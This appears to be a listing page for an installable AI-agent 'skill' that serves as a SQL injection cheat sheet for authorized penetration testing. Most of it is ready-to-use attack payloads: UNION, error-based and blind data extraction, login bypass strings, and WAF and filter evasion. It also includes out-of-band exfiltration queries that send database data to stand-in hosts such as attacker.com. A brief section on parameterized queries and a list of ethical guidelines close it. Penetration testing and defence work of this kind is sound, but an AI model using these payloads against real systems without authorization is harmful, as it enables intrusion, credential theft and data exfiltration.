🎁 Get the FREE AI Skills Starter Guide β€” Subscribe β†’
BytesAgainBytesAgain
πŸ¦€ ClawHub

SQL Injection Testing

by @brandonwise

Perform authorized security tests to detect, exploit, and validate defenses against SQL injection vulnerabilities in web applications.

Versionv1.0.0
Downloads2,181
Installs8
TERMINAL
clawhub install sql-injection-testing

πŸ“– About This Skill

SQL Injection Testing

Comprehensive SQL injection vulnerability assessment techniques for web applications, covering detection, exploitation, and defense validation.

Description

USE WHEN:

  • Testing for SQL injection vulnerabilities
  • Performing authorized penetration tests
  • Validating input sanitization mechanisms
  • Bypassing authentication for security testing
  • Extracting database information (authorized)
  • Learning SQL injection defense
  • DON'T USE WHEN:

  • No written authorization for testing
  • Testing production systems with real user data
  • Intent is malicious (don't be evil)
  • ⚠️ LEGAL REQUIREMENT: Written penetration testing authorization required before use.


    Detection Phase

    Injection Point Identification

    Common injectable parameters:

    URL params:    ?id=1, ?user=admin, ?category=books
    Form fields:   username, password, search, comments
    Cookies:       session_id, user_preference
    HTTP headers:  User-Agent, Referer, X-Forwarded-For
    

    Basic Vulnerability Tests

    -- Single quote test
    '

    -- Double quote test "

    -- Comment sequences -- # /**/

    -- Semicolon for query stacking ;

    Watch for:

  • Database error messages
  • HTTP 500 errors
  • Modified response content/length
  • Unexpected behavior changes
  • Boolean Logic Tests

    -- True condition (should return data)
    page.asp?id=1 or 1=1
    page.asp?id=1' or 1=1--
    page.asp?id=1" or 1=1--

    -- False condition (should return nothing/error) page.asp?id=1 and 1=2 page.asp?id=1' and 1=2--

    Compare responses between true/false to confirm injection.


    Exploitation Techniques

    UNION-Based Extraction

    -- Step 1: Determine column count
    ORDER BY 1--
    ORDER BY 2--
    ORDER BY 3--
    -- Continue until error occurs

    -- Step 2: Find displayable columns UNION SELECT NULL,NULL,NULL-- UNION SELECT 'a',NULL,NULL-- UNION SELECT NULL,'a',NULL--

    -- Step 3: Extract data UNION SELECT username,password,NULL FROM users-- UNION SELECT table_name,NULL,NULL FROM information_schema.tables-- UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--

    Error-Based Extraction

    -- MSSQL
    1' AND 1=CONVERT(int,(SELECT @@version))--

    -- MySQL (XPATH) 1' AND extractvalue(1,concat(0x7e,(SELECT @@version)))--

    -- PostgreSQL 1' AND 1=CAST((SELECT version()) AS int)--

    Blind Boolean-Based

    -- Character extraction
    1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--
    1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='b'--

    -- Conditional responses 1' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0--

    Time-Based Blind

    -- MySQL
    1' AND IF(1=1,SLEEP(5),0)--
    1' AND IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a',SLEEP(5),0)--

    -- MSSQL 1'; WAITFOR DELAY '0:0:5'--

    -- PostgreSQL 1'; SELECT pg_sleep(5)--

    Out-of-Band (OOB)

    -- MSSQL DNS exfiltration
    1; EXEC master..xp_dirtree '\\attacker-server.com\share'--

    -- MySQL DNS 1' UNION SELECT LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\a'))--

    -- Oracle HTTP 1' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--


    Authentication Bypass

    -- Classic bypass payloads
    admin'--
    admin'/*
    ' OR '1'='1
    ' OR '1'='1'--
    ' OR '1'='1'/*
    ') OR ('1'='1
    ') OR ('1'='1'--

    -- Query transformation example -- Original: SELECT * FROM users WHERE username='input' AND password='input' -- Injected (username: admin'--): -- SELECT * FROM users WHERE username='admin'--' AND password='anything' -- Password check bypassed!


    Filter Bypass Techniques

    Character Encoding

    -- URL encoding
    %27 (single quote)
    %22 (double quote)
    %23 (hash)

    -- Double URL encoding %2527 (single quote)

    -- Hex strings (MySQL) SELECT * FROM users WHERE name=0x61646D696E -- 'admin'

    Whitespace Alternatives

    -- Comment substitution
    SELECT//username//FROM/**/users

    -- Tab character SELECT%09username%09FROM%09users

    -- Newline SELECT%0Ausername%0AFROM%0Ausers

    Keyword Evasion

    -- Case variation
    SeLeCt, sElEcT, SELECT

    -- Inline comments SEL/*bypass*/ECT UN/*bypass*/ION

    -- Double writing (if filter removes once) SELSELECTECT β†’ SELECT UNUNIONION β†’ UNION


    Database Fingerprinting

    | Database | Version Query | |----------|---------------| | MySQL | SELECT @@version or SELECT version() | | MSSQL | SELECT @@version | | PostgreSQL | SELECT version() | | Oracle | SELECT banner FROM v$version | | SQLite | SELECT sqlite_version() |


    Information Schema Queries

    -- MySQL/MSSQL: List tables
    SELECT table_name FROM information_schema.tables WHERE table_schema=database()

    -- List columns SELECT column_name FROM information_schema.columns WHERE table_name='users'

    -- Oracle equivalent SELECT table_name FROM all_tables SELECT column_name FROM all_tab_columns WHERE table_name='USERS'


    Quick Reference

    | Purpose | Payload | |---------|---------| | Basic test | ' or " | | Boolean true | OR 1=1-- | | Boolean false | AND 1=2-- | | Comment (MySQL) | # or -- | | Comment (MSSQL) | -- | | UNION probe | UNION SELECT NULL-- | | Time delay | AND SLEEP(5)-- | | Auth bypass | ' OR '1'='1 |


    Detection Test Sequence

    1. Insert ' β†’ Check for error
    2. Insert " β†’ Check for error
    3. Try: OR 1=1-- β†’ Check for behavior change
    4. Try: AND 1=2-- β†’ Check for behavior change
    5. Try: ' WAITFOR DELAY '0:0:5'-- β†’ Check for delay
    


    Prevention (What to Look For in Code Review)

    ❌ Vulnerable

    const query = SELECT * FROM users WHERE id = '${userId}';
    

    βœ… Safe

    // Parameterized query
    const query = 'SELECT * FROM users WHERE id = $1';
    const result = await db.query(query, [userId]);

    // OR use ORM const user = await prisma.user.findUnique({ where: { id: userId } });


    Tools

  • SQLMap: Automated SQL injection
  • Burp Suite: Request manipulation
  • OWASP ZAP: Web app scanner
  • Havij: SQL injection tool

  • Troubleshooting

    | Problem | Solution | |---------|----------| | No error messages | Use blind injection (boolean/time-based) | | UNION fails | Check column count with ORDER BY | | WAF blocking | Use encoding/evasion techniques | | Payload not executing | Verify correct comment syntax for DB type | | Time-based inconsistent | Use longer delays (10+ seconds) |


    Ethical Guidelines

  • Never execute destructive queries (DROP, DELETE) without explicit authorization
  • Limit data extraction to proof-of-concept quantities
  • Stop immediately upon detecting production data
  • Report critical vulnerabilities through agreed channels
  • Document all activities for audit trail
  • πŸ“‹ Tips & Best Practices

    | Problem | Solution | |---------|----------| | No error messages | Use blind injection (boolean/time-based) | | UNION fails | Check column count with ORDER BY | | WAF blocking | Use encoding/evasion techniques | | Payload not executing | Verify correct comment syntax for DB type | | Time-based inconsistent | Use longer delays (10+ seconds) |